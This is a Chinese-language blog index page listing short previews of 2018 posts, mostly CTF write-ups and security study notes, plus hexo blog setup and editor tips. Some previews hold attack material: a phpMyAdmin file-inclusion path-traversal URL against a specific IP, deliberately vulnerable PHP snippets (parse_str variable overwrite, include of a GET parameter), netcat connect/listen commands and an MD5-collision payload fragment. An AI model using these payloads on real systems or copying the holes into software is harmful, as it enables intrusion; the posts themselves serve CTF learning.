- 博客(25)
- 资源 (4)
- 收藏
- 关注
RSS订阅原创 win10右键新建记事本不见了
新建一个文本,将下面的代码复制进去Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.txt] @="txtfile" "Content Type"="text/plain" [HKEY_CLASSES_ROOT\.txt\ShellNew] "NullFile"="" [HKEY_CLASSES_R...
2018-10-30 21:54:51
4560
原创 ctf python脚本
天下武功唯快不破 解题链接: http://ctf5.shiyanbar.com/web/10/10.php #!/usr/bin/python# -*- coding:utf8 -import requestsimport base64url = 'http://ctf5.shiyanbar.com/web/10/10.php're = requests.get(url)...
2018-10-30 21:42:36
2379
原创 bugku代码审计——WP
目录 1.extract变量覆盖2. strcmp比较字符串3.urldecode二次编码绕过4.md5()函数5.数组返回NULL绕过6.弱类型整数大小比较绕过7.sha()函数比较绕过8. md5加密相等绕过9.十六进制与数字比较10. 变量覆盖11.ereg正则%00截断12.strpos数组绕过13.数字验证正则绕过1.extra...
2018-10-30 20:25:30
1229
原创 代码审计--变量覆盖漏洞
可能会导致变量覆盖漏洞的函数有parse_str(),extract(),import_request_variables()以及$$。1.parse_str()导致的漏洞<!--parse_str($a = $_GET['flag']);if ($bdctf == "BCDEF") { echo $flag;}-->源码分析:a获得一个get值$fl...
2018-10-30 18:24:06
1699
2
原创 hexo+git搭建blog(2)
修改主题$ cd <博客存放的目录>$ git clone https://github.com/iissnan/hexo-theme-next themes/next打开blog父目录下的——config.ymlvi _config.yml将主题修改为nexttheme: next //默认为landscape部署到服务器hexo g -d ...
2018-10-25 11:14:34
224
原创 hexo+git搭建blog (1)
以前用wordpress搭建过一个blog,然后服务器到期啦,就没了。这几天想搭建个blog,就买了一个。看到很多人的个人blog都是用github当服务器,然后通过hexo来搭建blog框架,因此我也随了一波风。服务器为Ubuntu。优点使用github pages服务搭建博客的好处有:1. 全是静态文件,访问速度快; 2.免费方便,不用花一分钱就可以搭建一个自由的个...
2018-10-24 19:22:59
257
原创 phpmyadmin文件包含漏洞
http://139.199.31.116:9008/index.php?target=db_sql.php%253f/../../../../../../flag.txt
2018-10-21 19:47:47
962
原创 端口常用命令
1.netstat -anp 查看那些端口被打开2.nc -nvv 192.168.x.x 80 连接到192.168.x.x的TCP80端口3.nc -l 端口号 监听本地端口号4.python -m SimpleHTTPServer 端口号 (不指定默认为8000) 打开后自动监听该端口,ctrl+c结束其它nc查关的参数见: nc -help-i 设置数据报传送时...
2018-10-21 19:42:37
2562
原创 Bash Shellshock CVE-2014-6271(破壳)
Shellshell是一个程序,可以称为壳程序,用于用户与操作系统进行交互。Shell 既是一种命令语言,又是一种程序设计语言。Shell有很多中,这里列出其中几种- Bourne SHell(sh)- Bourne Again SHell(bash)- C SHell(csh)- KornSHell(ksh)- zsh运行shell脚本有两种办法:1.作为可执行程序...
2018-10-21 18:48:03
3773
原创 CRC32绕过RAR密码
遇到一道题,加密了50位。。。。,所以,爆破果断舍弃 事实上,rar的压缩文档中是提供一个CRC32的值,这个值是文档在压缩之前的CRC32值,相信很多人都知道:每个不同的文件都有唯一的一个CRC32值,就算是可能有重复的,那么在内容为1~49的这个小范围内的txt文本也不会有重复。题目提示6位纯数字,上脚本,爆破。#!/usr/bin/python# -*- coding...
2018-10-20 21:34:02
25729
5
原创 brupsuite response返回中文乱码问题
burpsuite response返回中文乱码,像下面这样: 解决方法设置User options——Display——HTTP Message Display的Font为中文字体,比如宋体、微软雅黑等。然后设置Character Sets为Use a specific character set:UTF-8(这里吐槽下,windows默认选择的是Recognize automatic...
2018-10-20 17:11:53
1060
原创 zip明文攻击
遇到一个有意思的题老套路,记事本,图片分层,binwalk跑,又或者winhex文件头,都没用,都没用!!!安利一波工具 oursecret (不懂得自行百度)用完之后得到一个压缩包,压缩包里有提示,百度一波,搜不到,查到是20世纪初,爆破一拨,密码19950822又发现一个压缩包,没有任何提示,因此考虑zip明文攻击,将readme.txt压缩,查看压缩算法,发...
2018-10-19 19:37:30
22446
12
原创 python爆破
ichunqiu平台上有一道web题象棋查看源码发现其中一个正则js,[abcmlyx]{2}ctf[0-9]{3}.js爆破一波#!/usr/bin/python# coding=utf-8import requestsurl1 = "http://a44460084873484cab7374e36274d8aa4111712deb514b8a.game.ichunqiu...
2018-10-18 22:25:08
1669
原创 php://
php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。php://input是用来接收post数据的。可使用火狐的hackbar或brupsuite提交post值。<?php @include($_GET["file"])?&...
2018-10-18 17:20:44
783
转载 robots.txt
Robots协议(也称为爬虫协议、机器人协议等)的全称是“网络爬虫排除标准”(Robots Exclusion Protocol),网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。简介:robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它[1] 。robots.txt是一个协议,而不是...
2018-10-17 22:02:49
1478
原创 南邮ctf--Wp
10.151.pass check$pass=@$_POST['pass'];$pass1=***********;//被隐藏起来的密码if(isset($pass)){if(@!strcmp($pass,$pass1)){echo "flag:nctf{*}";}else{echo "the pass is wrong!";}}else{echo "please i...
2018-10-17 21:43:36
1857
原创 异或加密
异或加密是一种很简单的加密算法,无论是原理还是操作性上,都不具备任何难度。异或运算符为XOR,在计算机中通常用"^"的符号表示(在英文模式下,按住shift键+键盘上方的数字6)。在二进制中:1 XOR 0=10 XOR 1=11 XOR 1=00 XOR 0=0可以看出若两个数相同取0,不同取1。例:运算11001 ^ 01011=10010用其他进制表示...
2018-10-16 22:25:47
4392
转载 各种类型文件头
由这些文件头即使文件后缀被乱改也可以通过查看二进制文件查出文件的匹配格式,当然这就是一些播放器识别文件的方法1、从Ultra-edit-32中提取出来的JPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638TIFF (tif),文件头:49492A00Windows Bitmap (bmp),文件头...
2018-10-16 21:33:13
1462
原创 zip文件格式
南邮平台上的一道题很有意思首先文件名叫做丘比龙de女神文件名叫做gif 因此我们修改后缀没有任何发现用HxD打开,在文件末尾发现50 4B 05 06,这是zip文件的标志,而且文件里有nvshen.jpg改后缀名为zip,打不开显示文件损坏。0X 3B是gif尾标记。后面是zip包,但是我们没有看到pk头,因此我们修改6C 6F 76 65为 50 4B 05...
2018-10-16 21:18:24
19230
原创 爬虫
#!/usr/bin/python# -*- coding:utf8 -import reimport urllibimport urllib2import cookielib#设置浏览器的cookiecookie = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(c...
2018-10-14 21:05:00
292
转载 pycharm快捷键及一些常用设置
Alt+Enter 自动添加包shift+O 自动建议代码补全Ctrl+t SVN更新Ctrl+k SVN提交Ctrl + / 注释(取消注释)选择的行Ctrl+Shift+F 高级查找Ctrl+Enter 补全Shift + Enter 开始新行TAB Shift+TAB 缩进/取消缩进所选择的行Ctrl + Alt + I 自动缩进行Ctrl + Y 删除当前插入符所在...
2018-10-14 20:23:23
109
原创 文件包含
php包含函数include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续进行require():只要程序一运行就包含文件,找不到包含的文件时会产生致命错误,并停止脚本include——once()和require_once():若文件中已被包含则不会再次包含 利用php://filter作为一个中间流来处理其过滤器名称来处理其他流,共有四个...
2018-10-12 21:29:44
330
原创 python学习之路--为什么中文不识别或者中文注释老报错
#!/usr/bin/python# -*- coding:utf8 -import sysreload(sys)sys.setdefaultencoding('utf8')import requestsfrom bs4 import BeautifulSoup resp=requests.get('http://www.507.sec')print(resp)...
2018-10-12 19:54:46
3668
原创 CTF2--php序列化与反序列化
前言 php反序列化遇到好多次,总是被虐,在百度的基础上总结一波, 如果有啥不会的,或者我哪里说错了,可以加1617376586互相学习探讨一下。php反序列化怎么判断是不是php反序列化那,基本上我是根据serialize(),unserialize()这两个函数来判断的。那么什么是序列化呢,序列化说通俗点就是把一个对象变成可以传输的字符串。而反序列化就是把那...
2018-10-12 14:15:59
399
2
原创 CTF学习之路1 php弱类型WriteUp
1.easy_md5查看源码使用强等于,使用数组绕过,相当于error=error使用bp抓包构造post param1[]=1&amp;amp;amp;amp;amp;amp;param2[]=2获得flag2.md5 collision查看源代码,使用bp抓包,并修改post值p1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56...
2018-10-11 20:16:57
638
vue-router.js
2019-11-03
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人